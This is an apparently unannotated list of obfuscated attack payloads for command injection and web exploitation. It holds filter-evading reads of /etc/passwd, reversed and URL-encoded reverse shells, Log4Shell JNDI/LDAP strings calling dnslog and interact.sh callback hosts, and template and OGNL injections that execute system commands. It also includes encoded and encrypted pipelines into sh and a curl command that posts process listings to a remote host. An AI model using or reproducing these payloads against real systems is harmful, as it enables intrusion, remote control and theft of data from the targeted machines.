$(printf 'hsab/nib/ e- 4321 1.0.0.721 cn'|rev)
cat /etc/pa?swd
cat /etc/pa’ss’wd
cat /etc/pa**wd
ec’h’o ‘cat /etc/examplewd’ | sed ‘s/example/pass/g’ | bash
;+$u+cat+/etc$u/passwd$u
;+$u+cat+/etc$u/passwd+\#
/???/??t+/???/??ss??
/?in/cat+/et?/passw?
/etc/passwd
/e?c/?asswd
/e*c/*asswd
/??c/?asswd
/??c/?assw?
`curl -L http://ⒼⓄⓄⒼⓁⒺ.ⒸⓄⓂ`
;+$u+cat+/etc$u/passwd$u
;+$u+cat+/etc$u/passwd+\#
/???/??t+/???/??ss??
/?in/cat+/et?/passw?
;+$u+cat+/etc$u/passwd$u
;+$u+cat+/etc$u/passwd+\#
$(printf 'hsab/nib/ e- 4321 1.0.0.721 cn'|rev)
"/???/??t /???/??ss??'."" --"
cd..\..\..\..\ && dir
cd..&&cd..&&cd..&&cd..&&dir
../../../../../../e*c/p*s*d{{' http://server/...
system(“cat /etc/passwd”);
~${ OGNL Payload }
%0a ls -la
/???/???/c?t$IFS/???/p?s?w?
t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}
${j${k8s:k5:-ND}${sd:k5:-${123%25ff:-${123%25ff:-${upper:ı}:}}}ldap://xxx.dnslog.cn}
${jndi${123%25ff:-}:ldap://xxx.dnslog.cn}
${jndi${nagli:-:}ldap:${::-/}/${hostName}.anything.interact.sh/a}}
;+$u+cat+/etc$u/passwd$u
;+$u+cat+/etc$u/passwd+\#
/???/??t+/???/??ss??
/?in/cat+/et?/passw?
printf dW5hbWUgLWE= | base64 -d | sh
; /b'i'n\/?at /e't'c\/\pa??\wd
a=ca;b=t;$a$b /et*/p*s*wd
$(printf 'hsab/nib/ e- 4321 1.0.0.721 cn'|rev)
cat$IFS$9${PWD%%[a-z]*}e*c${PWD%%[a-z]*}p?ss??
cat$IFS$9${PWD%%[a-z]*}e*c${PWD%%[a-z]*}p?ss??
${jnd${123%25ff:-${123%25ff:-i:}}ldap://{{callback_host}}/{{random}}}
"org.apache.commons.io.IOUtils.toString(java.lang.Runtime.getRuntime().exec(""uname -a"").getInputStream())"
"""${!#}<<<{\$\'\\$(($((${##}<<${##}))#${##}$#$#$#${##}${##}${##}$#))\'\$\'\\$(($((${##}<<${##}))#${##}$#$#$#${##}${##}$#${##}))\'\$\'\\$(($((${##}<<${##}))#${##}$#${##}$#$#$#${##}${##}))\'\$\'\\$(($((${##}<<${##}))#${##}$#$#${##}$#${##}${##}$#))\',\$\'\\$(($((${##}<<${##}))#${##}${##}$#${##}${##}${##}))\'\$\'\\$(($((${##}<<${##}))#${##}$#$#$#${##}${##}${##}${##}))\',\$\'\\$(($((${##}<<${##}))#${##}$#$#$#${##}${##}${##}${##}))\\$(($((${##}<<${##}))#${##}$#$#$#${##}${##}$#${##}))\\$(($((${##}<<${##}))#${##}$#${##}$#$#${##}$#$#))\\$(($((${##}<<${##}))#${##}$#${##}$#$#$#))\\$(($((${##}<<${##}))#${##}${##}${##}$#$#${##}))\\$(($((${##}<<${##}))#${##}$#$#${##}$#$#$#${##}))\\$(($((${##}<<${##}))#${##}$#${##}$#$#${##}$#$#))\\$(($((${##}<<${##}))#${##}$#$#$#${##}${##}${##}${##}))\\$(($((${##}<<${##}))#${##}${##}${##}$#$#${##}))\\$(($((${##}<<${##}))#${##}$#${##}$#$#$#$#$#))\\$(($((${##}<<${##}))#${##}$#$#$#${##}${##}$#${##}))\\$(($((${##}<<${##}))#${##}$#${##}$#$#$#${##}${##}))\\$(($((${##}<<${##}))#${##}$#${##}$#$#$#${##}${##}))\\$(($((${##}<<${##}))#${##}$#${##}$#$#${##}${##}${##}))\\$(($((${##}<<${##}))#${##}$#$#${##}$#$#$#$#))\'} ${!#}<<<{\$\'\\$(($((${##}<<${##}))#${##}$#$#$#${##}${##}${##}$#))\'\$\'\\$(($((${##}<<${##}))#${##}$#$#$#${##}${##}$#${##}))\'\$\'\\$(($((${##}<<${##}))#${##}$#${##}$#$#$#${##}${##}))\'\$\'\\$(($((${##}<<${##}))#${##}$#$#${##}$#${##}${##}$#))\',\$\'\\$(($((${##}<<${##}))#${##}${##}$#${##}${##}${##}))\'\$\'\\$(($((${##}<<${##}))#${##}$#$#$#${##}${##}${##}${##}))\',\$\'\\$(($((${##}<<${##}))#${##}$#$#$#${##}${##}${##}${##}))\\$(($((${##}<<${##}))#${##}$#$#$#${##}${##}$#${##}))\\$(($((${##}<<${##}))#${##}$#${##}$#$#${##}$#$#))\\$(($((${##}<<${##}))#${##}$#${##}$#$#$#))\\$(($((${##}<<${##}))#${##}${##}${##}$#$#${##}))\\$(($((${##}<<${##}))#${##}$#$#${##}$#$#$#${##}))\\$(($((${##}<<${##}))#${##}$#${##}$#$#${##}$#$#))\\$(($((${##}<<${##}))#${##}$#$#$#${##}${##}${##}${##}))\\$(($((${##}<<${##}))#${##}${##}${##}$#$#${##}))\\$(($((${##}<<${##}))#${##}$#${##}$#$#$#${##}${##}))\\$(($((${##}<<${##}))#${##}$#$#${##}$#${##}${##}$#))\\$(($((${##}<<${##}))#${##}$#$#$#${##}${##}$#${##}))\\$(($((${##}<<${##}))#${##}$#$#${##}$#$#$#$#))\\$(($((${##}<<${##}))#${##}$#$#${##}${##}${##}$#${##}))\\$(($((${##}<<${##}))#${##}$#${##}$#$#${##}${##}${##}))\'}"
bash%20-c%20%27bash%20-i%20%3E%26%20/dev/tcp/ipAddress/port%200%3E%261%27
php://filter/write=convert.iconv.utf-8.utf-16le|convert.quoted-printable-encode|convert.iconv.utf-16le.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log
cat /???/??ss??
cat /e??/p????? 
"echo '61776b20277b7072696e742024307d27202f3f3f2a632f3f2a7764' | xxd -p -r | sh echo ""U2FsdGVkX19AYgtqPB2JND9fswlDf/i2ZWP8FUTyqHS+7EUuA2meAMm9Cd1Z67lq1+e5qEUyJmBsvFsu5yzI3aftPy8q/qjIwVo8feoh1JM="" | openssl enc -d -des3 -base64 -pass pass:bex -pbkdf2 | sh | sh"
"{{var this.getTemplateFilter().addAfterFilterCallback(""system"").filter(""whoami"")}}"
"services.logging.getLogger(""foo"").error(""Job content executed"")"
%7B%22name%22%3A%22test.php%22%2C%22data%22%3A%22data%3Aimage%2Fpng%3Bbase64%2CiVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAIAAAD8GO2jAAAAVklEQVR4nGNcPD89JF9HRVRbMF0oJF9QT1NUWzFdKTs%2FPljAc143k%2FyPi9t%2BX9N9qif38ePJv1%2FvBnyyMFiXHMwwCkbBKBgFo2AUjIJRMApGwSgYfgAAI0oXArodV7QAAAAASUVORK5CYII%3D%22%7D
curl%2520-X%2520POST%2520--data%2520%22%24%28ps%2520-aux%29%22%2520192.168.1.91%2F%3F%60id%60
